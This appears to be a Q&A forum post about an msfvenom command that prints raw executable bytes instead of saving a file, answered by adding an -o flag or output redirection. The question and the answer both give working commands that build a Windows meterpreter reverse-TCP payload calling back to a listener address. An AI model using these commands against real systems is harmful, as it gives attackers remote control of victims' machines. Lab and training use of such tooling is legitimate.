# Msfvenom does not produce required payload

Tags: metasploit, kali-linux

I am trying to create a windows payload with msfvenom but it is not working properly:

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.15  LPORT=4444 -f exe payload.exe
```

**here is the error that I am getting**

```
CommandLineToArgvWapr_initialize0123456789.0.0.0.0bogus %pI64dNo host data of that type was foundHost not foundGraceful shutdown in progressWSAStartup not yet calledWinsock version out of rangeNetwork system is unavailableToo many levels of remote in pathStale NFS file handleDisc quota exceededToo many usersToo many processesDirectory not emptyNo route to hostHost is downFile name too longToo many levels of symbolic linksConnection refusedConnection timed outToo many references, can't spliceCan't send after socket shutdownSocket is not connectedSocket is already connectedNo buffer space availableConnection reset by peerSoftware caused connection abortNet connection resetNetwork is unreachableNetwork is downCan't assign requested addressAddress already in useAddress family not supportedProtocol family not supportedOperation not supported on socketSocket type not supportedProtocol not supportedBad protocol optionProtocol wrong type for socketMessage too longDestination address requiredSocket operation on non-socketOperation already in progressOperation now in progressOperation would blockToo many open socketsInvalid argumentBad addressPermission deniedBad file numberInterrupted system callAPR does not understand this error codeError string not specified yetpasswords do not matchThis function has not been implemented on this platformThere is no error, this value signifies an initialized error codeShared memory is implemented using a key systemShared memory is implemented using filesShared memory is implemented anonymouslyCould not find specified socket in poll list.End of file foundMissing parameter for the specified command line optionBad character specified on command linePartial results are valid but processing is incompleteThe timeout specified has expiredThe specified child process is not done executingThe specified child process is done executingThe specified thread is not detachedThe specified thread is detachedYour code just forked, and you are currently executing in the parent processYour code just forked, and you are currently executing in the child processInternal errorThe process is not recognized.The given path contained wildcard charactersThe given path is misformatted or contained invalid charactersThe given path was above the root pathThe given path is incompleteThe given path is relativeThe given path is absoluteThe specified network mask is invalid.The specified IP address is invalid.DSO load failedNo shared memory is currently availableNo thread key structure was provided and one was required.No thread was provided and one was required.No socket was provided and one was required.No poll structure was provided and one was required.No lock was provided and one was required.No directory was provided and one was required.No time was provided and one was required.No process was provided and one was required.An invalid socket was returnedAn invalid date has been providedA new pool could not be created.Unrecognized Win32 error code %d\\?\UNC\\\?\CancelIoGetCompressedFileSizeAGetCompressedFileSizeWZwQueryInformationFileGe tSecurityInfoGetNamedSecurityInfoAGetNamedSecurityInfoWUNC      \GetEffectiveRightsFromAclW��������ntdll.dllshell32ws2_32mswsockadvapi32kernel32▒�0�  H`Phh4VS_VERSION_INFO���?�StringFileInfo�040904b00
```

Answer (score 0, accepted):

I think its because you didn't specify the output argument. Try using the "-o" or the ">" argument.
Eg.

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f exe > out.exe
```

OR

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f exe -o out.exe
```